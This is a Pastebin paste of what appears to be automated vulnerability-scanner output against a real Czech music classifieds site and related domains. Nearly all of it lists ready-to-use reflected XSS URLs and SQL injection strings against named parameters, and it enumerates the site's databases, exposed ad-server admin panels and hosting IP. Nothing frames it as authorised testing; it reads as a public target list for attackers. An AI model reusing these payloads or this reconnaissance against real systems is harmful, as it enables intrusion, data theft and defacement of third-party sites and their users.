API tools faq
paste
Advertisement
sroub3k

hudebnibazar.cz

sroub3k
Aug 20th, 2011
678
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 16.32 KB | None | 0 0
raw download clone embed print report
  1. * XSS - Cross-site Scripting
  2.  
  3. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  4.  
  5. -metod get
  6. http://hudebnibazar.cz/smazat.php?"></style><script>alert(9)</script>
  7. http://hudebnibazar.cz/formular.php?"><object/onerror=alert(9)>
  8. http://hudebnibazar.cz/index.php?page=1&ins=25&order="><script>alert(9)</script>&kategorie=0
  9. http://hudebnibazar.cz/index.php?page=1&ins=25&order=3&kategorie='"--></style></script><script>alert(0x00064D)</script>
  10. http://hudebnibazar.cz/formular.php?ID=641587&page=1&kategorie=0&nabpop=vse&region=3&ins="><object/onerror=alert(9)>&order=3
  11. http://hudebnibazar.cz/formular.php?ID=641587&page=1&kategorie=0&nabpop=vse&region=3&ins=25&order='"--></style></script><script>alert(0x000897)</script>
  12. http://hudebnibazar.cz/inzerat.php?ID=641587&page=1&kategorie=0&nabpop=vse&region=3&ins='"--></style></script><script>alert(0x00089C)</script>&order=3
  13. http://hudebnibazar.cz/smazat.php?ID=641587&page=1&kategorie=0&nabpop=vse&region='"--></style></script><script>alert(0x0008A9)</script>&ins=25&order=3
  14. http://hudebnibazar.cz/inzerat.php?ID=641587&page=1&kategorie=0&nabpop=vse&region=3&ins=25&order='"--></style></script><script>alert(0x0008AA)</script>
  15. http://hudebnibazar.cz/smazat.php?page=1&kategorie='"--></style></script><script>alert(0x0005E9)</script>&nabpop=vse&region=3&ins=25&order=3
  16. http://hudebnibazar.cz/formular.php?page=1&kategorie='"--></style></script><script>alert(0x0005EB)</script>&nabpop=vse&region=3&ins=25&order=3
  17. http://hudebnibazar.cz/formular.php?page=1&kategorie="></style><script>alert(9)</script>&nabpop=vse&region=3&ins=25&order=3
  18. http://hudebnibazar.cz/index.php?page=2&kategorie='"--></style></script><script>alert(0x000631)</script>&nabpop=vse&region=3&fulltext=3&ins=25&order=3
  19. http://hudebnibazar.cz/index.php?page=1'"--></style></script><script>alert(0x0005F3)</script>&ins=25&order=3&kategorie=0
  20. http://hudebnibazar.cz/index.php?page=2'"--></style></script><script>alert(0x000601)</script>&kategorie=0&nabpop=vse&region=3&fulltext=3&ins=25&order=3
  21. http://hudebnibazar.cz/index.php?page=1&kategorie='"--></style></script><script>alert(0x000605)</script>&nabpop=vse&region=3&ins=25&order=3
  22. http://hudebnibazar.cz/inzerat.php?'"--></style></script><script>alert(0x000624)</script>
  23. http://hudebnibazar.cz/index.php?page=1&ins='"--></style></script><script>alert(0x000610)</script>&order=3&kategorie=0
  24. http://hudebnibazar.cz/index.php?page=1&ins="><body onload=alert(9)>&order=3&kategorie=0
  25. http://hudebnibazar.cz/index.php?page=2&kategorie='"--></style></script><script>alert(0x000631)</script>&nabpop=vse&region=3&fulltext=3&ins=25&order=3
  26. http://hudebnibazar.cz/inzerat.php?ID='"--></style></script><script>alert(0x000632)</script>&page=1&kategorie=0&nabpop=vse&region=3&ins=25&order=3
  27. http://hudebnibazar.cz/formular.php?ID='"--></style></script><script>alert(0x000653)</script>&page=1&kategorie=0&nabpop=vse&region=3&ins=25&order=3
  28. http://hudebnibazar.cz/formular.php?page=1&kategorie=0&nabpop=vse&region=3&ins='"--></style></script><script>alert(0x00065E)</script>&order=3
  29. http://hudebnibazar.cz/smazat.php?page=1&kategorie=0&nabpop=vse&region='"--></style></script><script>alert(0x000671)</script>&ins=25&order=3
  30. http://hudebnibazar.cz/smazat.php?ID='"--></style></script><script>alert(0x00067F)</script>&page=1&kategorie=0&nabpop=vse&region=3&ins=25&order=3
  31. http://hudebnibazar.cz/index.php?page=1&kategorie=0&nabpop=vse&region='"--></style></script><script>alert(0x00069A)</script>&ins=25&order=3
  32. http://hudebnibazar.cz/index.php?page=2&kategorie=0&nabpop=vse&region='"--></style></script><script>alert(0x0006BB)</script>&fulltext=3&ins=25&order=3
  33. http://hudebnibazar.cz/formular.php?ID=641587&page=1'"--></style></script><script>alert(0x0006CC)</script>&kategorie=0&nabpop=vse&region=3&ins=25&order=3
  34. http://hudebnibazar.cz/formular.php?page=1&kategorie=0&nabpop=vse&region=3&ins=25&order='"--></style></script><script>alert(0x0006D8)</script>
  35. http://hudebnibazar.cz/smazat.php?page=1&kategorie=0&nabpop=vse&region=3&ins='"--></style></script><script>alert(0x0006DE)</script>&order=3
  36. http://hudebnibazar.cz/inzerat.php?typ=nahlasit&ID='"--></style></script><script>alert(0x0006EF)</script>&page=1&kategorie=0&nabpop=vse&region=3&ins=25&order=3
  37. http://hudebnibazar.cz/inzerat.php?ID=641587&page=1'"--></style></script><script>alert(0x000703)</script>&kategorie=0&nabpop=vse&region=3&ins=25&order=3
  38. http://hudebnibazar.cz/formular.php?ID=641587&page=1&kategorie='"--></style></script><script>alert(0x000718)</script>&nabpop=vse&region=3&ins=25&order=3
  39. http://hudebnibazar.cz/smazat.php?ID=641587&page=1'"--></style></script><script>alert(0x000754)</script>&kategorie=0&nabpop=vse&region=3&ins=25&order=3
  40. http://hudebnibazar.cz/inzerat.php?ID='"--></style></script><script>alert(0x000796)</script>
  41. http://hudebnibazar.cz/inzerat.php?ID=641587&page=1&kategorie='"--></style></script><script>alert(0x0007A4)</script>&nabpop=vse&region=3&ins=25&order=3
  42. http://hudebnibazar.cz/smazat.php?ID=641587&page=1&kategorie='"--></style></script><script>alert(0x0007B3)</script>&nabpop=vse&region=3&ins=25&order=3
  43. http://hudebnibazar.cz/smazat.php?ID=641587&page=1&kategorie="></style><script>alert(9)</script>&nabpop=vse&region=3&ins=25&order=3
  44. http://hudebnibazar.cz/index.php?page=1&kategorie=0&nabpop=vse&region=3&ins='"--></style></script><script>alert(0x0007B9)</script>&order=3
  45. http://hudebnibazar.cz/index.php?page=2&kategorie=0&nabpop=vse&region=3&fulltext='"--></style></script><script>alert(0x0007CF)</script>&ins=25&order=3
  46. http://hudebnibazar.cz/smazat.php?page=1&kategorie=0&nabpop=vse&region=3&ins=25&order='"--></style></script><script>alert(0x0007DF)</script>
  47. http://hudebnibazar.cz/smazat.php?page=1&kategorie=0&nabpop=vse&region=3&ins=25&order="><object/onerror=alert(9)>
  48. http://hudebnibazar.cz/inzerat.php?err=as&typ=odpoved&ID=\'\"--></style></script><script>netsparker(0x0008FA)</script>&NactiZeSess=1&page=1&kategorie=0&nabpop=vse&region=&ins=25&order=
  49. http://hudebnibazar.cz/inzerat.php?err=as&typ=odpoved&ID=641587\0\'\"--></style></script><script>netsparker(0x00093D)</script>&NactiZeSess=1&page=1&kategorie=0&nabpop=vse&region=&ins=25&order=
  50. http://hudebnibazar.cz/inzerat.php?err=as&typ=nahlasit&ID=\'\"--></style></script><script>netsparker(0x000A1F)</script>&NactiZeSess=1&page=1&kategorie=0&nabpop=vse&region=&ins=25&order=
  51. http://hudebnibazar.cz/index.php?page=1&kategorie=0&nabpop=vse&region=3&ins=25&order='"--></style></script><script>alert(0x00091C)</script>
  52. http://hudebnibazar.cz/smazat.php?ID=641587&page=1&kategorie=0&nabpop=vse&region=3&ins=25&order='"--></style></script><script>alert(0x000961)</script>
  53. http://hudebnibazar.cz/index.php?page=2&kategorie=0&nabpop=vse&region=3&fulltext=3&ins="></script><script>alert(9)</script>&order=3
  54. http://hudebnibazar.cz/index.php?page=2&kategorie=0&nabpop=vse&region=3&fulltext=3&ins=25&order='"--></style></script><script>alert(0x00096F)</script>
  55. http://hudebnibazar.cz/zaslatheslo.php?'"--></style></script><script>alert(0x000999)</script>
  56. http://hudebnibazar.cz/zaslatheslo.php?ID=641587&back='"--></style></script><script>alert(0x0009B8)</script>
  57. http://hudebnibazar.cz/inzerat.php?typ=nahlasit&ID=641587&page=1&kategorie=0&nabpop=vse&region=3&ins='"--></style></script><script>alert(0x0009E2)</script>&order=3
  58. http://hudebnibazar.cz/inzerat.php?typ=nahlasit&ID=641587&page=1&kategorie=0&nabpop=vse&region=3&ins=25&order='"--></style></script><script>alert(0x0009EC)</script>
  59.  
  60. http://hudebnibazar.cz/index.php/"ns="alert(0x0005D6)
  61. Parameter Name: URI-BASED
  62. Parameter Type: RawUrlInjection
  63. Attack Pattern: /"ns="alert(0x0005D6)
  64.  
  65. - metod post
  66.  
  67. http://hudebnibazar.cz/formular.php?err=as&NactiZeSess=1
  68. Parameter Name: kategorie
  69. Parameter Type: Post
  70. Attack Pattern: "></script><script>alert(9)</script>
  71. -
  72. http://hudebnibazar.cz/smazat.php
  73. Parameter Name: page
  74. Parameter Type: Post
  75. Attack Pattern: 1'"--></style></script><script>alert(0x000974)</script>
  76. -
  77. http://hudebnibazar.cz/smazat.php
  78. Parameter Name: region
  79. Parameter Type: Post
  80. Attack Pattern: '"--></style></script><script>alert(0x00097F)</script>
  81. -
  82. http://hudebnibazar.cz/inzerat.php?err=as&typ=odpoved&ID=641587&NactiZeSess=1&page=1&kategorie=0&nabpop=vse&region=&ins=25&order=
  83. Parameter Name: replyto
  84. Parameter Type: Post
  85. Attack Pattern: '"--></style></script><script>alert(0x0009AD)</script>
  86. -
  87. http://hudebnibazar.cz/inzerat.php?err=as&typ=odpoved&ID=641587&NactiZeSess=1&page=1&kategorie=0&nabpop=vse&region=&ins=25&order=\0\'\"--></style></script><script>netsparker(0x0009C5)</script>
  88. Parameter Name: sess
  89. Parameter Type: Post
  90. Attack Pattern: page=1&kategorie=0&nabpop=vse&region=&ins=25&order='"--></style></script><script>alert(0x0009C5)</script>
  91. -
  92. http://hudebnibazar.cz/formular.php?ID=\'\"--></style></script><script>netsparker(0x000A63)</script>&err=he&NactiZeSess=1
  93. Parameter Name: ID
  94. Parameter Type: Post
  95. Attack Pattern: '"--></style></script><script>alert(0x000A63)</script>
  96. -
  97. http://hudebnibazar.cz/inzerat.php?err=as&typ=odpoved&ID=641587&NactiZeSess=1&page=1&kategorie=0&nabpop=vse&region=&ins=25&order=
  98. Parameter Name: textodpovedi
  99. Parameter Type: Post
  100. Attack Pattern: '"--></style></script><script>alert(0x000A04)</script>
  101. -------------------------------------------------------------------------
  102.  
  103. * [Possible] Permanent Cross-site Scripting
  104.  
  105. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  106.  
  107. Vulnerable URL: http://hudebnibazar.cz/formular.php?err=as&NactiZeSess=1
  108. Injection URL: http://hudebnibazar.cz/formular.php?err=as&NactiZeSess=1
  109. Parameter Name: heslo2
  110. Parameter Type: Post
  111. Attack Pattern: 'AND 1=(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))+'
  112.  
  113. Vulnerable URL: http://hudebnibazar.cz/inzerat.php?err=as&typ=nahlasit&ID=641587&NactiZeSess=1&page=1&kategorie=0&nabpop=vse&region=&ins=25&order=
  114. Injection URL: http://hudebnibazar.cz/inzerat.php?err=as&typ=nahlasit&ID=641587&NactiZeSess=1&page=1&kategorie=0&nabpop=vse&region=&ins=25&order=
  115. Parameter Name: p_spam
  116. Parameter Type: Post
  117. Attack Pattern: '+NSFTW+'
  118.  
  119. -------------------------------------------------------------------------
  120.  
  121. * COOKIE SQL INJECTION
  122.  
  123. ReferURL http://hudebnibazar.cz/index.php^fulltext=___640085
  124. Parameter fulltext=___640085
  125. Type String
  126. KWordActionURL Electro
  127. -
  128. ReferURL http://hudebnibazar.cz/index.php?order=&kategorie=0&page=1^ins=25
  129. Parameter ins=25
  130. Type Integer
  131. KWordActionURL Electro
  132.  
  133. -------------------------------------------------------------------------
  134. * URL SQL INJECTION
  135.  
  136. http://hudebnibazar.cz/index.php?page=1&nabpop=vse&region=&ins=25&order=&kategorie=310000
  137. http://hudebnibazar.cz/index.php?page=1&nabpop=vse&region=&ins=25&order=&kategorie=99999999
  138. http://hudebnibazar.cz/smazat.php?page=1&kategorie=310000&nabpop=vse&region=&ins=25&order=&ID=640085
  139. http://hudebnibazar.cz/smazat.php?page=1&kategorie=310000&nabpop=vse&region=&ins=25&order=&ID=99999999
  140. http://hudebnibazar.cz/formular.php?page=1&kategorie=310000&nabpop=vse&region=&ins=25&order=&ID=640085
  141. http://hudebnibazar.cz/formular.php?page=1&kategorie=310000&nabpop=vse&region=&ins=25&order=&ID=99999999
  142. http://hudebnibazar.cz/inzerat.php?page=1&kategorie=310000&nabpop=vse&region=&ins=25&order=&ID=640085
  143. http://hudebnibazar.cz/inzerat.php?page=1&kategorie=310000&nabpop=vse&region=&ins=25&order=&ID=99999999
  144. http://hudebnibazar.cz/inzerat.php?order=&ID=640085&page=1&kategorie=310000&nabpop=vse&region=&ins=25
  145. http://hudebnibazar.cz/zaslatheslo.php?back=smazat&ID=640085
  146. http://hudebnibazar.cz/zaslatheslo.php?back=smazat&ID=99999999
  147.  
  148. -------------------------------------------------------------------------
  149. * Database User Has Admin Privileges
  150.  
  151. Vulnerability Classifications: OWASP A6 CWE-16
  152.  
  153. http://hudebnibazar.cz/formular.php?page=1&kategorie=-1 OR 17-7=10&nabpop=vse&region=3&ins=25&order=3
  154. Parameter Name: kategorie
  155. Parameter Type: Querystring
  156. Attack Pattern: -1 OR 17-7=10
  157.  
  158. -------------------------------------------------------------------------
  159.  
  160. * Boolean Based SQL Injection
  161.  
  162. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  163.  
  164. http://hudebnibazar.cz/smazat.php?page=1&kategorie=-1 OR 17-7=10&nabpop=vse&region=3&ins=25&order=3
  165. Parameter Name: kategorie
  166. Parameter Type: Querystring
  167. Attack Pattern: -1 OR 17-7=10
  168.  
  169. http://hudebnibazar.cz/formular.php?page=1&kategorie=-1 OR 17-7=10&nabpop=vse&region=3&ins=25&order=3
  170. Parameter Name: kategorie
  171. Parameter Type: Querystring
  172. Attack Pattern: -1 OR 17-7=10
  173.  
  174. http://hudebnibazar.cz/index.php?page=1&kategorie=-1 OR 17-7=10&nabpop=vse&region=3&ins=25&order=3
  175. Parameter Name: kategorie
  176. Parameter Type: Querystring
  177. Attack Pattern: -1 OR 17-7=10
  178.  
  179. http://hudebnibazar.cz/index.php?page=1&ins=25&order=3&kategorie=-1 OR 17-7=10
  180. Parameter Name: kategorie
  181. Parameter Type: Querystring
  182. Attack Pattern: -1 OR 17-7=10
  183.  
  184. http://hudebnibazar.cz/formular.php?ID=-1 OR 17-7=10&page=1&kategorie=0&nabpop=vse&region=3&ins=25&order=3
  185. Parameter Name: ID
  186. Parameter Type: Querystring
  187. Attack Pattern: -1 OR 17-7=10
  188.  
  189. http://hudebnibazar.cz/smazat.php?ID=-1 OR 17-7=10&page=1&kategorie=0&nabpop=vse&region=3&ins=25&order=3
  190. Parameter Name: ID
  191. Parameter Type: Querystring
  192. Attack Pattern: -1 OR 17-7=10
  193.  
  194. http://hudebnibazar.cz/inzerat.php?typ=nahlasit&ID=-1 OR 17-7=10&page=1&kategorie=0&nabpop=vse&region=3&ins=25&order=3
  195. Parameter Name: ID
  196. Parameter Type: Querystring
  197. Attack Pattern: -1 OR 17-7=10
  198.  
  199. http://hudebnibazar.cz/inzerat.php?ID=-1 OR 17-7=10
  200. Parameter Name: ID
  201. Parameter Type: Querystring
  202. Attack Pattern: -1 OR 17-7=10
  203.  
  204. http://hudebnibazar.cz/smazat.php
  205. Parameter Name: kategorie
  206. Parameter Type: Post
  207. Attack Pattern: -1 OR 17-7=10
  208.  
  209. http://hudebnibazar.cz/zaslatheslo.php?ID=-1 OR 17-7=10&back=formular
  210. Parameter Name: ID
  211. Parameter Type: Querystring
  212. Attack Pattern: -1 OR 17-7=10
  213. -------------------------------------------------------------------------
  214.  
  215. * Password Transmitted Over HTTP
  216.  
  217. Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319
  218.  
  219. http://hudebnibazar.cz/formular.php?ID=641587&err=he&NactiZeSess=1
  220. Form target action: vloz2db.php
  221. -------------------------------------------------------------------------
  222. * Cookie Not Marked As HttpOnly
  223.  
  224. Vulnerability Classifications: OWASP A6 CWE-16
  225.  
  226. http://hudebnibazar.cz/smazat.php?page=1&kategorie=0&nabpop=vse&region=&ins=25&order=
  227. Identified Cookie: lastvisittemp
  228. .
  229. http://hudebnibazar.cz/index.php?page=1&kategorie=0&nabpop=vse&region=&ins=25&order=
  230. Identified Cookie: cook_ins
  231. .
  232. http://hudebnibazar.cz/formular.php?page=1&kategorie=0&nabpop=vse&region=&ins=25&order=
  233. Identified Cookie: lastvisittemp
  234. .
  235. http://hudebnibazar.cz/inzerat.php?ID=641587&page=1&kategorie=0&nabpop=vse&region=&ins=25&order=
  236. Identified Cookie: lastvisittemp
  237. .
  238. http://hudebnibazar.cz/zaslatheslo.php?ID=641587&back=smazat
  239. Identified Cookie: lastvisittemp
  240. .
  241. http://hudebnibazar.cz/odpoved.php
  242. Identified Cookie: PHPSESSID
  243. Parameter Name: asp
  244. Parameter Type: Post
  245. Attack Pattern: data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwOEU1KTwvc2NyaXB0Pg==
  246. .
  247. http://hudebnibazar.cz/vloz2db.php
  248. Identified Cookie: PHPSESSID
  249. Parameter Name: kategorie
  250. Parameter Type: Post
  251. Attack Pattern: '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
  252. .
  253. +++++++++++++++++++++++++++++++++++++++++++++++
  254. Servery a jejich databáze
  255.  
  256. Web Server: Apache
  257. DB Server: MySQL
  258. Current DB: hudebnibazar_cz
  259. Data Bases: information_schema
  260. FuzzyOcr
  261. adminis_kytary_cz
  262. forum_kytary_cz
  263. hudebnibazar_bak
  264. hudebnibazar_cz
  265. hudebnimagazin_cz
  266. iphone_inzerce
  267. iphonebazar_cz
  268. mail
  269. mysql
  270. openx_kytary_cz
  271. reklama_kytary_cz
  272. search_engine_position
  273.  
  274. http://hudebniforum.cz - http://hudebniforum.cz/hudebnibazar-cz
  275. http://hudebnimagazin.cz
  276. http://kytary.cz - http://eshop.kytary.cz
  277. ---------------------------------------
  278.  
  279. http://iphonebazar.cz
  280.  
  281. XSS
  282. Vulnerable URL : http://iphonebazar.cz/?q=node/'" ns=netsparker(0x000CEF) &page='" ns=alert(0x000CEF)
  283.  
  284. ---------------------------------------
  285. http://forum.kytary.cz
  286. http://openx.kytary.cz/www/admin/index.php / Welcome to OpenX
  287. http://reklama.kytary.cz/admin/index.php / Vítejte v Openads
  288. http://kacenka.kytary.cz - sdilena IP
  289. http://kacenka2.kytary.cz - Not Found, pouze Apache - 87.236.194.214 --------------
  290. ---------------------------------------
  291. whois
  292.  
  293. IP address [?]: 87.236.194.214
  294. CZ
  295. Czech Republic
  296. COOLHOUSING s.r.o.
  297. Organization: Coolhousing
  298.  
  299. Host of this IP: [?]: smtp2.mail.kytary.cz
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!